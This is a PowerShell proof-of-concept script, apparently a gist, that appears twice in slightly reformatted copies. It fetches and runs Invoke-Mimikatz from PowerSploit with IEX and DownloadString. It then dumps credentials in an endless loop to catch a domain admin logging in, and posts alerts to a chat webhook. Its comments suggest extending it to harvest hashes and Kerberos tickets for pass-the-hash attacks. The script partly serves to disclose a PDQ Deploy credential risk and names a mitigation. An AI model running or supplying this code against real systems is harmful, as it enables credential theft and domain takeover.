GarthKiepper/pdq_login_detection.ps

## pdq_login_detection.ps
# Date: 7/8/17
# Author: Garth Kiepper
# Description: This PowerShell was created as a proof-of-concept attempting to demonstrate that
# a user with local admin privileges can compromise the credentials used in PDQ deploy. It is
# common for enterprises to use PDQ deploy to push software to endpoint machines, and many
# administrators mistakenly use their domain admin credentials to do this. Worst case scenario,
# an attacker can compromise the domain. This could be mitigated by using an account with limited
# privileges to push software via PDQ deploy. With this in mind, the attacker can still compromise
# this account but gains less privileges as a result. Full mitigation techniques while still
# utilizing PDQ deploy are unknown to the author. For convenience, logins are logged to RocketChat
# in real time.

# Note: although this script has been tested to detect logins, it has not been verified to actually
# compromise an account used for PDQ deploy in a production domain. This testing is planned to be
# performed by the author in the near future. It's also worth noting that no code here is
# specifically oriented towards detecting PDQ deploy logins. In fact, you can use this to detect
# other shoddy forms of software deployment by your domain admins, whether they used PowerShell, or
# just happened to login to your box. This script can also help a user ensure they are the only
# logged on user.

# Future work:
# This script can be expanded to dump passwords, hashes, and kerberos tickets for pass-the-hash and
# pass-the-ticket impersonation. This is trivial, and can be accomplished by reading the entire output
# of mimikatz.

# Download mimikatz from PowerSploit
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');

# Send message to rocket chat.
Function Send-To_RocketChat($messageText){
    $notificationPayload = @{ text="$messageText"; }
    $uri = 'INSERT ROCKET CHAT HOOK URL HERE'
    Invoke-RestMethod -Uri $uri -Method Post -Body (ConvertTo-Json $notificationPayload) -ContentType "application/json"
}

# Repeatedly run mimikatz. Each iteration takes about 16 seconds.
while ($true) {
    $result = Invoke-Mimikatz -DumpCreds | Out-String

    # Name of admin username to detect login from.
    $admin = 'INSERT DOMAIN ADMIN USERNAME HERE'
    if ($result.Contains(": " + $admin)) {
        Send-To_RocketChat("Detected logon via mimikatz.")
    }
}
	# Date: 7/8/17
	# Author: Garth Kiepper
	# Description: This PowerShell was created as a proof-of-concept attempting to demonstrate that
	# a user with local admin privileges can compromise the credentials used in PDQ deploy. It is
	# common for enterprises to use PDQ deploy to push software to endpoint machines, and many
	# administrators mistakenly use their domain admin credentials to do this. Worst case scenario,
	# an attacker can compromise the domain. This could be mitigated by using an account with limited
	# privileges to push software via PDQ deploy. With this in mind, the attacker can still compromise
	# this account but gains less privileges as a result. Full mitigation techniques while still
	# utilizing PDQ deploy are unknown to the author. For convenience, logins are logged to RocketChat
	# in real time.

	# Note: although this script has been tested to detect logins, it has not been verified to actually
	# compromise an account used for PDQ deploy in a production domain. This testing is planned to be
	# performed by the author in the near future. It's also worth noting that no code here is
	# specifically oriented towards detecting PDQ deploy logins. In fact, you can use this to detect
	# other shoddy forms of software deployment by your domain admins, whether they used PowerShell, or
	# just happened to login to your box. This script can also help a user ensure they are the only
	# logged on user.

	# Future work:
	# This script can be expanded to dump passwords, hashes, and kerberos tickets for pass-the-hash and
	# pass-the-ticket impersonation. This is trivial, and can be accomplished by reading the entire output
	# of mimikatz.

	# Download mimikatz from PowerSploit
	IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');

	# Send message to rocket chat.
	Function Send-To_RocketChat($messageText){
	$notificationPayload = @{ text="$messageText"; }
	$uri = 'INSERT ROCKET CHAT HOOK URL HERE'
	Invoke-RestMethod -Uri $uri -Method Post -Body (ConvertTo-Json $notificationPayload) -ContentType "application/json"
	}

	# Repeatedly run mimikatz. Each iteration takes about 16 seconds.
	while ($true) {
	$result = Invoke-Mimikatz -DumpCreds \| Out-String

	# Name of admin username to detect login from.
	$admin = 'INSERT DOMAIN ADMIN USERNAME HERE'
	if ($result.Contains(": " + $admin)) {
	Send-To_RocketChat("Detected logon via mimikatz.")
	}
	}
No results found